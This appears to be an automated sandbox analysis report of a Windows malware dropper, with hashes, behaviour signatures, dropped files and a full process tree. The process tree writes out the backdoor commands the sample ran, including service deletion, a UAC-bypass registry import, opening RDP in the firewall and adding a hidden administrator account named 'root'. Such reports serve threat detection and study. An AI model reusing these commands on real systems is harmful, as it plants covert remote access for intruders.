Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-08-2024 20:00

General

  • Target

    b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe

  • Size

    6.6MB

  • MD5

    b4d453087720b8fbf93147c039f4f8fb

  • SHA1

    cfc9c30a92a61d0009bc4e21a1a808180d278218

  • SHA256

    42da9414a2faba94899ebaa84cd32841ac30db80d655c5be4d32ef568cc35014

  • SHA512

    1d498db675a631d91821786ef657d94814eadc8fc6062ad8256692bd5cf3e35632fce94e96d4672993b0fa36ed424cd7815d3ba81862ce0a75df4feebe9e9c51

  • SSDEEP

    98304:9Xz+/uvg6x/emUKoJV5ElkmPNJgpEdneZi+H02YqAQcmJ3Q/mUfBA9qcu1ccH6i1:FK21H5WV5ElzMpYXY0fBQcb7BA2hHf

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 32 IoCs
  • UPX packed file 42 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 1 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\ProgramData\CardWindows\WinDevInstall.exe
      "C:\ProgramData\CardWindows\WinDevInstall.exe" -p7832489354378589235643543456
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\ProgramData\CardWindows\start1.exe
        "C:\ProgramData\CardWindows\start1.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\ProgramData\CardWindows\start.exe
          "C:\ProgramData\CardWindows\start.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\ProgramData\CardWindows\Builder.exe
            "C:\ProgramData\CardWindows\Builder.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2596
          • C:\ProgramData\CardWindows\Builder2.exe
            "C:\ProgramData\CardWindows\Builder2.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3056
          • C:\ProgramData\CardWindows\WinUpdate.exe
            "C:\ProgramData\CardWindows\WinUpdate.exe" -p5387687645378674524512345389721228
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\ProgramData\CardWindows\WinUpdate1.exe
              "C:\ProgramData\CardWindows\WinUpdate1.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2728
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\ProgramData\CardWindows\SysInstall.bat" "
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3004
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +s +h "C:\ProgramData\CardWindows"
                  8⤵
                  • Sets file to hidden
                  • System Location Discovery: System Language Discovery
                  • Views/modifies file attributes
                  PID:2204
                • C:\Windows\SysWOW64\sc.exe
                  sc stop RManService
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2896
                • C:\Windows\SysWOW64\sc.exe
                  sc stop VDeviceCard
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2856
                • C:\Windows\SysWOW64\sc.exe
                  sc stop NPackStereo
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:988
                • C:\Windows\SysWOW64\sc.exe
                  sc stop ServiceWork
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2504
                • C:\Windows\SysWOW64\sc.exe
                  sc stop IntelDriver
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1992
                • C:\Windows\SysWOW64\sc.exe
                  sc stop AMIHardware
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1696
                • C:\Windows\SysWOW64\sc.exe
                  sc delete RManService
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:912
                • C:\Windows\SysWOW64\sc.exe
                  sc delete VDeviceCard
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:324
                • C:\Windows\SysWOW64\sc.exe
                  sc delete NPackStereo
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2500
                • C:\Windows\SysWOW64\sc.exe
                  sc delete ServiceWork
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2872
                • C:\Windows\SysWOW64\sc.exe
                  sc delete IntelDriver
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:928
                • C:\Windows\SysWOW64\sc.exe
                  sc delete AMIHardware
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:904
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im rfusclient.exe /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1940
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im rutserv.exe /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1156
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\SYSTEM\Nvidia\Toolbar\DeviceCard" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:564
                • C:\Windows\SysWOW64\regedit.exe
                  regedit /s "C:\ProgramData\CardWindows\config_set.reg"
                  8⤵
                  • UAC bypass
                  • System Location Discovery: System Language Discovery
                  • Runs .reg file with regedit
                  PID:704
                • C:\ProgramData\CardWindows\CDevice.exe
                  "C:\ProgramData\CardWindows\CDevice.exe" /silentinstall
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1012
                • C:\ProgramData\CardWindows\CDevice.exe
                  "C:\ProgramData\CardWindows\CDevice.exe" /firewall
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:2476
                • C:\Windows\SysWOW64\regedit.exe
                  regedit /s "C:\ProgramData\CardWindows\config_set.reg"
                  8⤵
                  • UAC bypass
                  • System Location Discovery: System Language Discovery
                  • Runs .reg file with regedit
                  PID:1648
                • C:\Windows\SysWOW64\sc.exe
                  sc failure VDeviceCard reset= 0 actions= restart/500/restart/500/restart/500
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2240
                • C:\Windows\SysWOW64\sc.exe
                  sc config VDeviceCard obj= LocalSystem type= interact type= own
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2656
                • C:\ProgramData\CardWindows\CDevice.exe
                  "C:\ProgramData\CardWindows\CDevice.exe" /start
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2768
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +s +h "C:\ProgramData\CardWindows\*.*"
                  8⤵
                  • Sets file to hidden
                  • System Location Discovery: System Language Discovery
                  • Views/modifies file attributes
                  PID:2252
          • C:\ProgramData\CardWindows\RDP.exe
            "C:\ProgramData\CardWindows\RDP.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1636
            • C:\ProgramData\RDP\RDPWrapper_run.exe
              "C:\ProgramData\RDP\RDPWrapper_run.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2392
              • C:\ProgramData\RDP\RDPWrapper.exe
                "C:\ProgramData\RDP\RDPWrapper.exe" -p27852786784527827414245258638727424524124452741245527212
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2244
                • C:\ProgramData\RDP\run.exe
                  "C:\ProgramData\RDP\run.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1420
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\ProgramData\RDP\run.bat" "
                    9⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1804
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2368
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2912
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                      10⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:980
                    • C:\Windows\SysWOW64\net.exe
                      net user root /add
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1980
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user root /add
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:1628
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2864
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:1640
                    • C:\Windows\SysWOW64\net.exe
                      net user root 12345
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2980
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user root 12345
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:836
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
                      10⤵
                      • Hide Artifacts: Hidden Users
                      • System Location Discovery: System Language Discovery
                      PID:1632
                    • C:\ProgramData\RDP\RDPWInst.exe
                      "C:\ProgramData\RDP\RDPWInst.exe" -i -o
                      10⤵
                      • Server Software Component: Terminal Services DLL
                      • Executes dropped EXE
                      • Modifies WinLogon
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1608
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                        11⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:2808
                    • C:\ProgramData\RDP\RDPWInst.exe
                      "C:\ProgramData\RDP\RDPWInst.exe" -w
                      10⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2872
  • C:\ProgramData\CardWindows\CDevice.exe
    C:\ProgramData\CardWindows\CDevice.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:2320
    • C:\ProgramData\CardWindows\sysdevices.exe
      C:\ProgramData\CardWindows\sysdevices.exe /tray
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1168
    • C:\ProgramData\CardWindows\sysdevices.exe
      C:\ProgramData\CardWindows\sysdevices.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:2936
      • C:\ProgramData\CardWindows\sysdevices.exe
        C:\ProgramData\CardWindows\sysdevices.exe /tray
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: SetClipboardViewer
        PID:3008

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\CardWindows\Builder2.exe

    Filesize

    154KB

    MD5

    2f9404a1546b74fa36fd3f29e026240c

    SHA1

    e52498e70014a1411dd824faa6ac242a8174e8d5

    SHA256

    8c3380b859808f262b3b2b50784a6df4787a494def2798f04551df76bf54db5c

    SHA512

    a0000a04a2bc05e5d4472ae03dea797a1a666965eccbfa2db3a96b199c1ccc1071f8104398ae6ad57a39e97b163e07171e587ee1e5203b40646ab2d8e3641106

  • C:\ProgramData\CardWindows\CDevice.exe

    Filesize

    1.8MB

    MD5

    d72d6920de3d805ae296d1eb546fda02

    SHA1

    cc64201ba895902ef597d232138838c80c5d88d1

    SHA256

    ace233bd79a1bed3cb78bc0036690583bf1a81b177299ed02c503fac4c3e9cdd

    SHA512

    b8bf5ceb62f376f9ae443159cbdad6d01b213031e2ffc220649153e8a8ec2524dc28f829012b58f049a3eccdeba7860d89910daa0fb608ee71f416f2dcf07d39

  • C:\ProgramData\CardWindows\Russian.lg

    Filesize

    48KB

    MD5

    e44e34bc285b709f08f967325d9c8be1

    SHA1

    e73f05c6a980ec9d006930c5343955f89579b409

    SHA256

    1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

    SHA512

    576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

  • C:\ProgramData\CardWindows\SysInstall.bat

    Filesize

    1KB

    MD5

    a00d1b7d978dcd3728e14c3f0e2386df

    SHA1

    596deee85bd6521c9d3fb7ffe3654aa0b386e9ed

    SHA256

    00baf3f49d72d9ae56cd5dbfbcd0a3a87b88ae3e768cbfe8a77769fd443a1cd5

    SHA512

    fe8a3752ba3bfddeb979f0a3cb8787218525057b873481f24169c6629851f862059ceb1cc52ed03f6b1bea87866833a107226b6a1a5ab969b959de0d56987c80

  • C:\ProgramData\CardWindows\WinDevInstall.exe

    Filesize

    6.4MB

    MD5

    33f6a4ac5579f90e922133688e63aec5

    SHA1

    d4be64a1d028942b41565ef11b4fc89e29ec29c2

    SHA256

    52d404ea9e55ca686af6fc07cefd56e8f83a728109145d92842782999505f38a

    SHA512

    f711b4d5bcac8f9a377dd036834f8146a75021d236405e38e4369c912bb377d011790795e18044267e1f7eb2daa807bff35298dfddcab164e8086644bbdd9f65

  • C:\ProgramData\CardWindows\WinUpdate.exe

    Filesize

    4.2MB

    MD5

    06453777004fb5230908f0e685994b82

    SHA1

    84febca11f852a8743f43cc0e6800b9a42837c4a

    SHA256

    7711ff56bc0b3d0b7699a6bf55cdb82bc99075375ec3ba0054974508f232faf6

    SHA512

    93fcd9aa358b6473e1a7c3fa791b150eaf05dd5270bb09844c0cbcf7a058ba2dcd6c71664b637df222bd9c087b1fd10ad19fcf081fc3437fe74c2d78646e7579

  • C:\ProgramData\CardWindows\config_set.reg

    Filesize

    12KB

    MD5

    7335428a17c58c550a3cac2e1e60fdfb

    SHA1

    62e6f6d3917660ca320ae78e0d9893c41592417d

    SHA256

    2f2c82b0a2ca9b358ead399799620fac240bdb2eca8fdc4f5a79c85daecd88c9

    SHA512

    5013623fe1691d45ebb073b76db2c00a396961b201efb4c840c8984e2613b77204c061a6add1a0e5f7741cbd8078c7ec4dfb9f1a028abef94c38ea21ac5ade05

  • C:\ProgramData\CardWindows\vp8decoder.dll

    Filesize

    378KB

    MD5

    d43fa82fab5337ce20ad14650085c5d9

    SHA1

    678aa092075ff65b6815ffc2d8fdc23af8425981

    SHA256

    c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b

    SHA512

    103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

  • C:\ProgramData\RDP\RDPWInst.exe

    Filesize

    1.3MB

    MD5

    9c257b1d15817a818a675749f0429130

    SHA1

    234d14da613c1420ea17de60ab8c3621d1599f6f

    SHA256

    b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

    SHA512

    b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

  • C:\ProgramData\RDP\RDPWrapper.exe

    Filesize

    1.6MB

    MD5

    e4814efdb3d6761683665c487a02ef2b

    SHA1

    ecd25ee74af98658000e36b90c58af628b6ab6b8

    SHA256

    5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

    SHA512

    982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

  • C:\ProgramData\RDP\RDPWrapper_run.exe

    Filesize

    368KB

    MD5

    35862d6de7d5f5a21a111f4e9c831839

    SHA1

    891e59e3a6798ac60ef333cdfb7969ef02a3e77c

    SHA256

    5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

    SHA512

    00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

  • C:\ProgramData\RDP\run.bat

    Filesize

    612B

    MD5

    4e6a1033e3c2f39db397d392fe0d7c77

    SHA1

    11526234cd216334902d51665529c2b9be7acc05

    SHA256

    2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4

    SHA512

    395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb

  • C:\ProgramData\RDP\run.exe

    Filesize

    368KB

    MD5

    c4f61801834172c1f1973e8791311340

    SHA1

    de48c219435feda6680c474b445c8f548441abc7

    SHA256

    c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

    SHA512

    8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

  • C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

    Filesize

    36B

    MD5

    8708699d2c73bed30a0a08d80f96d6d7

    SHA1

    684cb9d317146553e8c5269c8afb1539565f4f78

    SHA256

    a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

    SHA512

    38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

  • C:\Users\Admin\AppData\Local\Temp\Cab345B.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar348D.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • \??\PIPE\samr

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \ProgramData\CardWindows\RDP.exe

    Filesize

    1.8MB

    MD5

    06500c519e9a20c6851d55e4ec6a1bff

    SHA1

    d09baa50160cd02e31f3f617ea24e1f655dd67cb

    SHA256

    3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

    SHA512

    217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

  • \ProgramData\CardWindows\WinUpdate1.exe

    Filesize

    158KB

    MD5

    a87f9f2ec81f6e06092bc89c52953b32

    SHA1

    c6b44dc646f26b6c896eb528d5caee0fd2a24061

    SHA256

    8696215c45e4c49aab4c819181efb2201216dadadcb764572a3f1ecbcd3a41ed

    SHA512

    b77fee6c4b45d9383d2989b82edd1b2d2a218bf48013339d91738a244b2ee4d9ac468c70d1b558252324d43d6bd51955da859531a3cbc9e3f3b5eda9a46fcbbd

  • \ProgramData\CardWindows\start.exe

    Filesize

    154KB

    MD5

    dc9f7f087a52cccbfca60aa59f389f9e

    SHA1

    4a747d3ebf91d11cf1cb282b23cdf5e6cfbdc283

    SHA256

    53858e39610891bae32f60ecee885de73eba50da6d5e1b9160ca6134e408fc03

    SHA512

    777180c3e5e0c723413ba6e6064fdad9dc7ceb8fc8653a46f33683c8e0eae531d0a5d86528e6562cf9218919fcfc2ea842e0f41a8fd910400fd6e480588985f1

  • \ProgramData\CardWindows\start1.exe

    Filesize

    154KB

    MD5

    d56be8efb222e9a40fe8e5486ac1c624

    SHA1

    53285b987182fb6b94bd41ad4c639336a4ff80cb

    SHA256

    df650b6ffa69ca42452c17e9dc7a82bf7cf3eea96cdb7c64329bbb68eb2fb88b

    SHA512

    904ef0ea1f3ea9aad9dfbffd79c4883852bb74494f9271bb5e19ee6b8fb8370ba3b01e8942aec5892b9855dddd40badd5e553324764c3ae19c229ad123d28f71

  • memory/1012-179-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/1012-175-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/1168-324-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/1168-314-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/1168-320-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/1168-331-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/1168-221-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/1168-338-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/1420-167-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/1608-257-0x0000000000400000-0x0000000000553000-memory.dmp

    Filesize

    1.3MB

  • memory/1636-99-0x0000000000400000-0x0000000000433000-memory.dmp

    Filesize

    204KB

  • memory/1672-80-0x0000000000400000-0x0000000000467000-memory.dmp

    Filesize

    412KB

  • memory/1672-62-0x00000000022B0000-0x0000000002317000-memory.dmp

    Filesize

    412KB

  • memory/1672-60-0x0000000000720000-0x0000000000730000-memory.dmp

    Filesize

    64KB

  • memory/1976-125-0x0000000003B70000-0x0000000003BDA000-memory.dmp

    Filesize

    424KB

  • memory/2320-202-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

  • memory/2320-315-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-212-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

  • memory/2320-347-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-197-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-344-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-312-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

  • memory/2320-330-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-313-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

  • memory/2320-323-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-46-0x0000000003990000-0x00000000039F7000-memory.dmp

    Filesize

    412KB

  • memory/2320-337-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-311-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2320-38-0x0000000003980000-0x00000000039E7000-memory.dmp

    Filesize

    412KB

  • memory/2392-105-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/2476-183-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2476-184-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2480-25-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/2596-79-0x0000000000400000-0x0000000000467000-memory.dmp

    Filesize

    412KB

  • memory/2704-48-0x0000000000400000-0x0000000000467000-memory.dmp

    Filesize

    412KB

  • memory/2704-52-0x00000000003D0000-0x00000000003E0000-memory.dmp

    Filesize

    64KB

  • memory/2704-54-0x00000000037A0000-0x0000000003807000-memory.dmp

    Filesize

    412KB

  • memory/2704-57-0x0000000000400000-0x0000000000467000-memory.dmp

    Filesize

    412KB

  • memory/2728-162-0x0000000000400000-0x000000000046A000-memory.dmp

    Filesize

    424KB

  • memory/2728-137-0x0000000000400000-0x000000000046A000-memory.dmp

    Filesize

    424KB

  • memory/2728-150-0x0000000000520000-0x0000000000530000-memory.dmp

    Filesize

    64KB

  • memory/2768-188-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2768-201-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

  • memory/2872-310-0x0000000000400000-0x0000000000553000-memory.dmp

    Filesize

    1.3MB

  • memory/2936-318-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/2936-222-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/3004-182-0x00000000025C0000-0x0000000002C72000-memory.dmp

    Filesize

    6.7MB

  • memory/3004-187-0x00000000025C0000-0x0000000002C72000-memory.dmp

    Filesize

    6.7MB

  • memory/3004-174-0x00000000025C0000-0x0000000002C72000-memory.dmp

    Filesize

    6.7MB

  • memory/3008-256-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/3008-255-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

  • memory/3056-70-0x0000000000400000-0x0000000000467000-memory.dmp

    Filesize

